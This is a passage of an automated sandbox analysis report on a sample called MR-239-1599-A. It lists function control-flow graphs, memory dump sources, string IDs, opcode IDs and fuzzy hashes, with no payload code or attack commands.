LoadLibraryExW 38931->38932 38933 2b0d2b7 38932->38933 38933->38929 38934 5297630 38935 529763f 38934->38935 38941 52971e0 38935->38941 38938 5297e5e 38939 52992e7 38940 529769e 38940->38938 38945 5297400 38940->38945 38942 52971eb 38941->38942 38943 5297400 LoadLibraryExW 38942->38943 38944 52992e7 38943->38944 38944->38940 38946 529740b 38945->38946 38948 2b04420 LoadLibraryExW 38946->38948 38950 2b07543 38946->38950 38947 52993ca 38947->38939 38948->38947 38951 2b0754b 38950->38951 38953 2b07803 38951->38953 38954 5299480 LoadLibraryExW 38951->38954 38955 5299490 LoadLibraryExW 38951->38955 38952 2b07841 38952->38947 38953->38952 38956 2b0c338 LoadLibraryExW 38953->38956 38957 2b0c32b LoadLibraryExW 38953->38957 38954->38953 38955->38953 38956->38952 38957->38952 38958 7860e28 38961 7860364 38958->38961 38960 7860e47 38962 786036f 38961->38962 38964 2b04420 LoadLibraryExW 38962->38964 38965 2b07543 LoadLibraryExW 38962->38965 38963 7860ecc 38963->38960 38964->38963 38965->38963

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 05297630 Relevance: 26.8, Strings: 20, Instructions: 1751COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 527 5297630-529763e 528 529763f-5297655 527->528 530 5297656-5297a52 call 52971e0 call 52971f0 call 5297200 * 3 call 5297220 call 5297200 call 5297220 call 5297200 call 5297220 call 5297200 * 4 call 5297220 call 5297200 * 4 call 5297220 call 5297200 call 5297230 528->530 629 5297a54 530->629 630 5297a86-5297a92 530->630 633 5297a5a-5297a6e 629->633 631 5297ad4-5297ae3 630->631 632 5297a94-5297a9a 630->632 635 5297ae9-5297b03 631->635 636 5297c56-5297cd1 call 5297250 call 5297260 call 5297270 631->636 634 5297a9d-5297abc 632->634 637 52992ae-52992c0 633->637 638 5297a74-5297a84 633->638 634->637 639 5297ac2-5297ad2 634->639 640 5297b05-5297b14 635->640 641 5297b57-5297b63 635->641 985 5297cd4 call 7861127 636->985 986 5297cd4 call 7861138 636->986 647 52992c2-5299338 call 5297400 call 5297410 call 5297420 call 5297430 call 5297440 637->647 648 5299247-5299252 637->648 638->630 638->633 639->631 639->634 643 5297b17-5297b3f 640->643 645 5297bc9-5297bd5 641->645 646 5297b65-5297b7d 641->646 643->637 649 5297b45-5297b55 643->649 645->637 652 5297bdb-5297bf6 645->652 651 5297b80-5297bb1 646->651 691 529933d-5299395 call 5297410 647->691 653 5299259-52992ad call 5294b84 call 52973f0 * 2 648->653 649->641 649->643 651->637 656 5297bb7-5297bc7 651->656 652->637 657 5297bfc-5297c0c 652->657 656->645 656->651 657->637 658 5297c12-5297c35 call 5297240 657->658 658->637 673 5297c3b-5297c50 658->673 673->635 673->636 698 5297cd7-5297d0b call 5297280 987 5297d0e call 7861af7 698->987 988 5297d0e call 7861c84 698->988 989 5297d0e call 7861b43 698->989 990 5297d0e call 7861b41 698->990 991 5297d0e call 7861b98 698->991 704 5297d11-5297de8 call 5297290 call 52972a0 call 52972b0 call 52972c0 704->637 717 5297dee-5297e07 704->717 717->637 719 5297e0d-5297e3d 717->719 719->637 722 5297e43-5297e58 719->722 722->637 724 5297e5e-5297e91 722->724 727 5297e97-5299252 call 5297280 call 52972d0 call 5297290 call 52972a0 call 52972b0 call 52972c0 call 52972e0 call 52972f0 call 5297300 call 5297310 call 5297300 call 5297320 call 5297310 call 5297300 call 5297320 call 5297300 call 5297310 call 5297300 call 5297320 call 5297300 call 5297310 call 5297300 call 5297320 call 5297300 * 2 call 5297320 call 52972f0 call 5297300 * 2 call 5297320 call 5297300 call 5297320 call 5297300 * 2 call 5297320 call 5297310 call 5297300 call 5297330 call 5297320 call 5297310 call 5297300 call 5297320 call 5297310 call 5297300 call 5297320 call 5297300 * 2 call 5297320 call 5297340 call 5297350 call 5297280 call 5297360 call 5297290 call 52972a0 call 52972b0 call 52972c0 call 5297370 call 5297380 call 5297390 call 52973a0 call 52973b0 call 52973c0 * 3 call 5297280 call 52973d0 call 52973e0 call 52972a0 724->727 727->653 985->698 986->698 987->704 988->704 989->704 990->704 991->704
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1653348350.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5290000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: !$($($A$A$B$B$B$B$B$B$B$B$B$B$B$B$E$E$s
                                                                                                                                                                                                          • API String ID: 0-2059019390
                                                                                                                                                                                                          • Opcode ID: 9d5aa84b7a2f2aa0be874fba63c630cb3e7df2df4fcb644a66e17f2348b8737f
                                                                                                                                                                                                          • Instruction ID: 4a5fd8fd2ce07cbef36ff8443d830db6d58d7bf8f17c8181a29d7a70ca2776ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d5aa84b7a2f2aa0be874fba63c630cb3e7df2df4fcb644a66e17f2348b8737f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7033F34A20215CFCB15DF68C894A99B7B2FF89300F1585E9E809AF365DB71AD85CF90
                                                                                                                                                                                                          Function 05297623 Relevance: 26.7, Strings: 20, Instructions: 1696COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 992 5297623-5297628 993 529762b-529763e 992->993 994 5297653-5297655 992->994 996 529763f-5297651 993->996 994->996 997 5297656-529768b 994->997 996->994 1001 5297695-5297699 call 52971e0 997->1001 1003 529769e-52976a9 1001->1003 1005 52976b3-52976b7 call 52971f0 1003->1005 1007 52976bc-52976c7 1005->1007 1009 52976d1-52976d5 call 5297200 1007->1009 1011 52976da-5297a52 call 5297200 * 2 call 5297220 call 5297200 call 5297220 call 5297200 call 5297220 call 5297200 * 4 call 5297220 call 5297200 * 4 call 5297220 call 5297200 call 5297230 1009->1011 1096 5297a54 1011->1096 1097 5297a86-5297a92 1011->1097 1100 5297a5a-5297a6e 1096->1100 1098 5297ad4-5297ae3 1097->1098 1099 5297a94-5297a9a 1097->1099 1102 5297ae9-5297b03 1098->1102 1103 5297c56-5297c92 call 5297250 call 5297260 1098->1103 1101 5297a9d-5297abc 1099->1101 1104 52992ae-52992c0 1100->1104 1105 5297a74-5297a84 1100->1105 1101->1104 1106 5297ac2-5297ad2 1101->1106 1107 5297b05-5297b14 1102->1107 1108 5297b57-5297b63 1102->1108 1148 5297c9c-5297ca0 call 5297270 1103->1148 1114 52992c2 1104->1114 1115 5299247-5299252 1104->1115 1105->1097 1105->1100 1106->1098 1106->1101 1110 5297b17-5297b3f 1107->1110 1112 5297bc9-5297bd5 1108->1112 1113 5297b65-5297b7d 1108->1113 1110->1104 1116 5297b45-5297b55 1110->1116 1112->1104 1119 5297bdb-5297bf6 1112->1119 1118 5297b80-5297bb1 1113->1118 1121 52992c8-52992e2 call 5297400 1114->1121 1120 5299259-52992ad call 5294b84 call 52973f0 * 2 1115->1120 1116->1108 1116->1110 1118->1104 1123 5297bb7-5297bc7 1118->1123 1119->1104 1124 5297bfc-5297c0c 1119->1124 1130 52992e7-5299320 call 5297410 call 5297420 1121->1130 1123->1112 1123->1118 1124->1104 1125 5297c12-5297c35 call 5297240 1124->1125 1125->1104 1140 5297c3b-5297c50 1125->1140 1150 5299325-5299338 call 5297430 call 5297440 1130->1150 1140->1102 1140->1103 1154 5297ca5-5297cbd 1148->1154 1158 529933d-5299395 call 5297410 1150->1158 1163 5297cc4-5297cd1 1154->1163 1452 5297cd4 call 7861127 1163->1452 1453 5297cd4 call 7861138 1163->1453 1165 5297cd7-5297cff call 5297280 1170 5297d04-5297d0b 1165->1170 1454 5297d0e call 7861af7 1170->1454 1455 5297d0e call 7861c84 1170->1455 1456 5297d0e call 7861b43 1170->1456 1457 5297d0e call 7861b41 1170->1457 1458 5297d0e call 7861b98 1170->1458 1171 5297d11-5297d57 call 5297290 call 52972a0 1175 5297d5c-5297d91 call 52972b0 1171->1175 1177 5297d96-5297db8 call 52972c0 1175->1177 1181 5297dbd-5297dde 1177->1181 1183 5297de4-5297de8 1181->1183 1183->1104 1184 5297dee-5297e07 1183->1184 1184->1104 1186 5297e0d-5297e3d 1184->1186 1186->1104 1189 5297e43-5297e58 1186->1189 1189->1104 1191 5297e5e-5297e75 1189->1191 1193 5297e7f-5297e91 1191->1193 1194 5297e97-5299252 call 5297280 call 52972d0 call 5297290 call 52972a0 call 52972b0 call 52972c0 call 52972e0 call 52972f0 call 5297300 call 5297310 call 5297300 call 5297320 call 5297310 call 5297300 call 5297320 call 5297300 call 5297310 call 5297300 call 5297320 call 5297300 call 5297310 call 5297300 call 5297320 call 5297300 * 2 call 5297320 call 52972f0 call 5297300 * 2 call 5297320 call 5297300 call 5297320 call 5297300 * 2 call 5297320 call 5297310 call 5297300 call 5297330 call 5297320 call 5297310 call 5297300 call 5297320 call 5297310 call 5297300 call 5297320 call 5297300 * 2 call 5297320 call 5297340 call 5297350 call 5297280 call 5297360 call 5297290 call 52972a0 call 52972b0 call 52972c0 call 5297370 call 5297380 call 5297390 call 52973a0 call 52973b0 call 52973c0 * 3 call 5297280 call 52973d0 call 52973e0 call 52972a0 1193->1194 1194->1120 1452->1165 1453->1165 1454->1171 1455->1171 1456->1171 1457->1171 1458->1171
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1653348350.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5290000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: !$($($A$A$B$B$B$B$B$B$B$B$B$B$B$B$E$E$s
                                                                                                                                                                                                          • API String ID: 0-2059019390
                                                                                                                                                                                                          • Opcode ID: d5dce3adebf856e41298f9b1c7e5f47c07beef5f579bf3ac49ccf9aa9f871706
                                                                                                                                                                                                          • Instruction ID: 6aebf5d152c1d0a8e82cfcfe64452a2cd5a5414b8d0d4dcf71e942607594e88a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5dce3adebf856e41298f9b1c7e5f47c07beef5f579bf3ac49ccf9aa9f871706
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E033F34A20215CFCB15DF68C894A99B7B2FF89300F1585E9E809AF365DB71AD85CF90
                                                                                                                                                                                                          Function 07864F38 Relevance: 5.5, Strings: 4, Instructions: 463COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 1678 7864f38-7864f56 1679 7864f5d-7864f83 1678->1679 1680 7864f58 1678->1680 1683 7864f86-7864f8c 1679->1683 1680->1679 1684 7864f37 1683->1684 1685 7864f8e-7865050 1683->1685 1684->1678 1692 7865052-786508b 1685->1692 1693 7865091-7865095 1685->1693 1692->1693 1694 78650d6-78650da 1693->1694 1695 7865097-78650d0 1693->1695 1696 78650dc-7865115 1694->1696 1697 786511b-786511f 1694->1697 1695->1694 1696->1697 1700 7865182-78651dd 1697->1700 1701 7865121-7865129 1697->1701 1713 7865214-786523e 1700->1713 1714 78651df-7865212 1700->1714 1703 7865170-7865174 1701->1703 1705 7864d46-7864d4a 1703->1705 1706 786517a-7865180 1703->1706 1708 7864d5c-7864d62 1705->1708 1709 7864d4c-7864d5a 1705->1709 1706->1700 1707 786512b-786516d 1706->1707 1707->1703 1712 7864da7-7864dab 1708->1712 1711 7864dba-7864dec 1709->1711 1733 7864e16 1711->1733 1734 7864dee-7864dfa 1711->1734 1716 7864d64-7864d70 1712->1716 1717 7864dad 1712->1717 1729 7865247-78652b4 1713->1729 1714->1729 1720 7864d77-7864d7f 1716->1720 1721 7864d72 1716->1721 1718 7864db0-7864db4 1717->1718 1718->1711 1722 7864d2c-7864d43 1718->1722 1725 7864da4 1720->1725 1726 7864d81-7864d95 1720->1726 1721->1720 1722->1705 1725->1712 1730 7864d9b-7864da2 1726->1730 1731 7864cf9-7864d04 1726->1731 1748 78652ba-78652c6 1729->1748 1730->1717 1735 786537d-7865385 1731->1735 1736 7864d0a-7864d27 1731->1736 1739 7864e1c-7864e49 1733->1739 1737 7864e04-7864e0a 1734->1737 1738 7864dfc-7864e02 1734->1738 1736->1718 1742 7864e14 1737->1742 1738->1742 1746 7864e4b-7864e83 1739->1746 1747 7864e98-7864f2b 1739->1747 1742->1739 1752 78652ef-78652f4 1746->1752 1768 7864f34-7864f35 1747->1768 1769 7864f2d 1747->1769 1750 78652cd-78652e0 1748->1750 1750->1752 1754 78652f6-7865304 1752->1754 1755 786530b-786532a 1752->1755 1754->1755 1760 7864c95-7864ca1 1755->1760 1761 7865330-7865337 1755->1761 1762 7864ca3 1760->1762 1763 7864ca8-7864cc3 1760->1763 1762->1763 1765 7865359-7865365 1763->1765 1766 7864cc9-7864cee 1763->1766 1771 786536b-7865377 1765->1771 1766->1771 1772 7864cf4-7864cf6 1766->1772 1768->1683 1769->1768 1771->1735 1772->1731
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'^q$:$pbq$~
                                                                                                                                                                                                          • API String ID: 0-999388165
                                                                                                                                                                                                          • Opcode ID: 14d9a65a8ec1302cb92b6461a8c72c292b1a288aca18a9dc827a749225d375cb
                                                                                                                                                                                                          • Instruction ID: 246c75c77338760bd2d712a45306e568b3dac3edc744d73dbf25dc58eab37951
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14d9a65a8ec1302cb92b6461a8c72c292b1a288aca18a9dc827a749225d375cb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8422E275A00218EFDB15DF98C944E98BBB2FF59304F1580E9E609AB262D732ED91DF10
                                                                                                                                                                                                          Function 0786458E Relevance: 5.2, Strings: 4, Instructions: 208COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 1773 786458e-7864691 1783 7864693-786469f 1773->1783 1784 78646bb 1773->1784 1785 78646a1-78646a7 1783->1785 1786 78646a9-78646af 1783->1786 1787 78646c1-786478d 1784->1787 1788 78646b9 1785->1788 1786->1788 1796 78647b7 1787->1796 1797 786478f-786479b 1787->1797 1788->1787 1800 78647bd-7864900 call 776b4d0 1796->1800 1798 78647a5-78647ab 1797->1798 1799 786479d-78647a3 1797->1799 1801 78647b5 1798->1801 1799->1801 1820 7864906 call 786c020 1800->1820 1821 7864906 call 786c030 1800->1821 1801->1800 1814 786490c-786494a call 776c3c0 1817 786494f-7864957 1814->1817 1820->1814 1821->1814
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                          • API String ID: 0-2125118731
                                                                                                                                                                                                          • Opcode ID: b6e4acd356ede6643c0c27652709b9134ac4cecddb2e1197bce18d09c1440b7b
                                                                                                                                                                                                          • Instruction ID: bc2b591c714193435f59d7d79d492fd71fb76941a0c94295d4e060cdf36d4f21
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6e4acd356ede6643c0c27652709b9134ac4cecddb2e1197bce18d09c1440b7b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7B19278A00118CFDB64DF68C990B9DBBB2FB99710F1085EAD909A7355DB319E81CF50
                                                                                                                                                                                                          Function 07864190 Relevance: 2.8, Strings: 2, Instructions: 258COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 1822 7864190-78641bb 1823 78641c2-7864226 1822->1823 1824 78641bd 1822->1824 1826 7864966-786496f 1823->1826 1827 786422c 1823->1827 1824->1823 1829 7864974 1826->1829 1875 786422d call 7865390 1827->1875 1876 786422d call 78653a0 1827->1876 1828 7864233-7864246 1830 786424c-786429b call 7863c7c 1828->1830 1831 786497a-7864980 1828->1831 1829->1831 1832 7864986-786498f 1830->1832 1838 78642a1-78642c4 1830->1838 1831->1832 1840 7864535-786453e 1838->1840 1841 78642ca-78642f5 1838->1841 1843 7864544-786454d 1840->1843 1841->1843 1845 78642fb 1841->1845 1843->1826 1846 78642fc-7864338 1845->1846 1849 786433b-7864345 1846->1849 1850 786434b-7864356 1849->1850 1851 7864408-786440c 1849->1851 1852 78644ce-78644d4 1850->1852 1853 786435c-7864360 1850->1853 1851->1846 1854 7864412-7864417 1851->1854 1860 78644da-78644e1 1852->1860 1853->1846 1855 7864362-786437d 1853->1855 1856 7864394-78643cf 1854->1856 1857 786441d-786446b 1854->1857 1858 78643f3-7864405 1855->1858 1859 786437f-7864392 1855->1859 1862 78643d0-78643e2 1856->1862 1877 7864471 call 786c020 1857->1877 1878 7864471 call 786c030 1857->1878 1858->1851 1859->1856 1859->1862 1864 7864512 1860->1864 1865 78644e3-7864511 1860->1865 1862->1849 1866 78643e8-78643f0 1862->1866 1864->1840 1865->1864 1866->1858 1872 7864477-78644cc 1872->1860 1875->1828 1876->1828 1877->1872 1878->1872
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Te^q$Te^q
                                                                                                                                                                                                          • API String ID: 0-3743469327
                                                                                                                                                                                                          • Opcode ID: fdb7c645e9ee9cea8229540b9ace16e4239c61bd1b461c1d69d3f7c1d6a021a3
                                                                                                                                                                                                          • Instruction ID: aec63442aadffc4de21cafde2b3d216303e4025c8702b74ef9c5708acfd5f154
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdb7c645e9ee9cea8229540b9ace16e4239c61bd1b461c1d69d3f7c1d6a021a3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CB1A3B4E002599FDB54DFA9C894B9DBBF2BB59300F1084A9D809EB355DB309A85CF50
                                                                                                                                                                                                          Function 07867247 Relevance: 1.7, Strings: 1, Instructions: 485COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 1952 7867247-786725c 1953 786725e-786727d 1952->1953 1954 7867288-78672b6 call 7863d74 1952->1954 1953->1954 1957 786727f-7867287 1953->1957 1960 7867ab4-7867abd 1954->1960 1961 78672bc-78672de 1954->1961 1963 7867ac3-7867acf 1960->1963 1961->1963 1964 78672e4-78672fd 1961->1964 1965 7867ad5-7867adb 1963->1965 1964->1965 1968 7867303-786730a 1964->1968 1967 7867ae1-7867aeb 1965->1967 1969 7867310-7867340 1968->1969 1970 7867681-7867687 1968->1970 1969->1967 1976 7867346-78673a8 1969->1976 1971 786768a-78676a0 1970->1971 1972 78676a6-78676ac 1971->1972 1973 7867a20-7867a58 1971->1973 1975 78676b3-78676b9 1972->1975 1985 7867a6d-7867a8f 1973->1985 1978 78676bf-78676ff 1975->1978 1979 78677cc-78677d0 1975->1979 1976->1975 1989 78673ae-78673b4 1976->1989 1996 78677c0-78677c6 1978->1996 1980 78677d6-7867860 1979->1980 1981 78678fe-7867902 1979->1981 2073 7867866 call 7867cf2 1980->2073 2074 7867866 call 7867cf0 1980->2074 2075 7867866 call 7867be8 1980->2075 2076 7867866 call 7867bf8 1980->2076 1981->1985 1986 7867908-7867a0f 1981->1986 2044 7867a11 1986->2044 2045 7867a1d 1986->2045 1994 78673b6-78673ba 1989->1994 1995 78673e5-786741b 1989->1995 1994->1995 1998 78673bc-78673c0 1994->1998 2009 7867426-786746b 1995->2009 1996->1979 2000 7867704-786778f 1996->2000 1998->1995 2003 78673c2-78673d9 1998->2003 2070 7867795 call 7867f18 2000->2070 2071 7867795 call 7867f28 2000->2071 2003->1971 2005 78673df-78673e3 2003->2005 2005->1995 2005->2009 2032 7867471-78674ca 2009->2032 2023 786786c-7867878 2026 786787e-7867883 2023->2026 2028 7867885-78678b2 call 7867247 2026->2028 2029 78678ca-78678ce 2026->2029 2042 78678b8-78678c4 2028->2042 2029->2026 2030 78678d0-78678ed 2029->2030 2036 78678ef 2030->2036 2037 78678fb 2030->2037 2031 786779b-78677ad call 78681f4 2038 78677b3-78677bd 2031->2038 2046 78674cc-78674d3 2032->2046 2036->2037 2037->1981 2038->1996 2042->2029 2044->2045 2045->1973 2047 7867514-7867518 2046->2047 2048 78674d5-7867513 2046->2048 2049 7867553-78675a1 2047->2049 2050 786751a-7867552 2047->2050 2048->2047 2057 78675a3-78675a5 2049->2057 2058 78675ae-78675b1 2049->2058 2050->2049 2061 78675a7 2057->2061 2062 78675ac 2057->2062 2059 78675b3 2058->2059 2060 78675b8-786767c 2058->2060 2059->2060 2060->1985 2061->2062 2062->2060 2070->2031 2071->2031 2073->2023 2074->2023 2075->2023 2076->2023
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: {z}
                                                                                                                                                                                                          • API String ID: 0-1552007774
                                                                                                                                                                                                          • Opcode ID: aac2c2bc6c2f0ca69a5cfefbf7481092ebbc36662abc057d3694a19436423e1f
                                                                                                                                                                                                          • Instruction ID: 2b229b68c82fa2b9b85aaef0d7b08e37927110fae62c771d030405bdb9912830
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aac2c2bc6c2f0ca69a5cfefbf7481092ebbc36662abc057d3694a19436423e1f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22329DB4A002299FDB64DF68D994BDDBBB2BB59704F1081EAE449E7350DB309E81CF50
                                                                                                                                                                                                          Function 02B0A368 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 2077 2b0a368-2b0a377 2078 2b0a3a3-2b0a3a7 2077->2078 2079 2b0a379-2b0a386 call 2b09680 2077->2079 2081 2b0a3a9-2b0a3b3 2078->2081 2082 2b0a3bb-2b0a3fc 2078->2082 2085 2b0a388 2079->2085 2086 2b0a39c 2079->2086 2081->2082 2088 2b0a409-2b0a417 2082->2088 2089 2b0a3fe-2b0a406 2082->2089 2132 2b0a38e call 2b0a600 2085->2132 2133 2b0a38e call 2b0a5f0 2085->2133 2086->2078 2090 2b0a419-2b0a41e 2088->2090 2091 2b0a43b-2b0a43d 2088->2091 2089->2088 2093 2b0a420-2b0a427 call 2b0968c 2090->2093 2094 2b0a429 2090->2094 2096 2b0a440-2b0a447 2091->2096 2092 2b0a394-2b0a396 2092->2086 2095 2b0a4d8-2b0a598 2092->2095 2098 2b0a42b-2b0a439 2093->2098 2094->2098 2127 2b0a5a0-2b0a5cb GetModuleHandleW 2095->2127 2128 2b0a59a-2b0a59d 2095->2128 2099 2b0a454-2b0a45b 2096->2099 2100 2b0a449-2b0a451 2096->2100 2098->2096 2103 2b0a468-2b0a471 call 2b0969c 2099->2103 2104 2b0a45d-2b0a465 2099->2104 2100->2099 2108 2b0a473-2b0a47b 2103->2108 2109 2b0a47e-2b0a483 2103->2109 2104->2103 2108->2109 2110 2b0a4a1-2b0a4ae 2109->2110 2111 2b0a485-2b0a48c 2109->2111 2118 2b0a4b0-2b0a4ce 2110->2118 2119 2b0a4d1-2b0a4d7 2110->2119 2111->2110 2113 2b0a48e-2b0a49e call 2b096ac call 2b096bc 2111->2113 2113->2110 2118->2119 2129 2b0a5d4-2b0a5e8 2127->2129 2130 2b0a5cd-2b0a5d3 2127->2130 2128->2127 2130->2129 2132->2092 2133->2092
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02B0A5BE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                          • Opcode ID: 98b51fa7b1ee9e9eb6806da869093493c0f7c6d9c33143fbbc4c133fd8f83c13
                                                                                                                                                                                                          • Instruction ID: 89bc7bd29ccf8dccf0082674f1bc6054e7d033e2d2185ec2b191e2959ad7a7bd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98b51fa7b1ee9e9eb6806da869093493c0f7c6d9c33143fbbc4c133fd8f83c13
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07713470A00B058FDB25DF6AD18575ABBF1FF88304F048A6DD58AD7A90DB34E845CB90
                                                                                                                                                                                                          Function 052936D0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 05293791
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1653348350.0000000005290000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_5290000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                                                                                          • Opcode ID: 2fdb7838944a58d133d50c960a587b427ae4020983f102eef817f49d80eaab65
                                                                                                                                                                                                          • Instruction ID: d22ab555bef3591bfa0ae6895dd5d87742a830dd3c7e80befecf5c0db77827bb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fdb7838944a58d133d50c960a587b427ae4020983f102eef817f49d80eaab65
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 334129B8910309CFCB14CF99C488AAABBF5FF98314F24C859D519AB361D775A841CFA0
                                                                                                                                                                                                          Function 078664C4 Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: [
                                                                                                                                                                                                          • API String ID: 0-784033777
                                                                                                                                                                                                          • Opcode ID: 0e525a286bd966fa338e2997296e83c7923a1abe0c0f7c404a9ed89566710a3f
                                                                                                                                                                                                          • Instruction ID: 20ffddf0ffc5d4d6396d71b5c28ed3ba912b9541367b0d555f2c626f05c69694
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e525a286bd966fa338e2997296e83c7923a1abe0c0f7c404a9ed89566710a3f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F1D0B4A01269DFDB64DF68D884B9DBBB2BF49304F1081E9D409AB354EB309E81CF51
